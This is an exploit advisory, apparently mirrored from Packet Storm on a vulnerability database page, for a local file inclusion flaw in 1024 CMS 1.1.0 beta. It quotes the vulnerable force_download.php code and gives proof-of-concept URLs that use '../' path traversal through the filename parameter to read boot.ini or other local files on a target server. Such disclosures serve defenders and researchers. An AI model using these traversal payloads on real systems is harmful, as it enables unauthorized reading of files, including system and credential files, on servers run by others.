Lucene search
K

1024 CMS 1.1.0 Beta Local File Inclusion

🗓️ 19 Oct 2011 00:00:00Reported by Sangyun YOOType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

The 1024 CMS Version 1.1.0 Beta Local File Inclusion Vulnerability in force_download.ph

Code
`# Exploit Title: [1024 CMS Version 1.1.0 beta(/complete-modules/modules/forcedownload/force_download.php) Local File Inclusion Vulnerability]  
# Date: [2011/10/19]  
# Author: [Sangyun YOO][I2SEC]  
# Email: yoosy0302 at naver dot com  
# Software Link: [http://1024cms.org/]  
# Version: [1024 CMS Version 1.1.0 beta]  
# Tested on: [Windows 7 Starter K]  
  
---------------------------------------  
  
source of force_download.php:  
1: <?php  
2 include(dirname(__FILE__)."/cls_forcedl.php");  
3: $filename = $_GET['filename']; <----------------- LFI  
4: $forcedl = new forcedownload();  
5: $forcedl->dlfile($filename);  
6: exit();  
6: ?>  
  
---------------------------------------  
  
proof of concept:  
http://[attacked_box]/[1024cms v1.1.0 beta]/complete-modules/modules/forcedownload/force_download.php?filename=../../../../../../../../boot.ini  
  
http://[attacked_box]/[1024cms v1.1.0 beta]/complete-modules/modules/forcedownload/force_download.php?filename=../../../../../../../../[localfile]  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation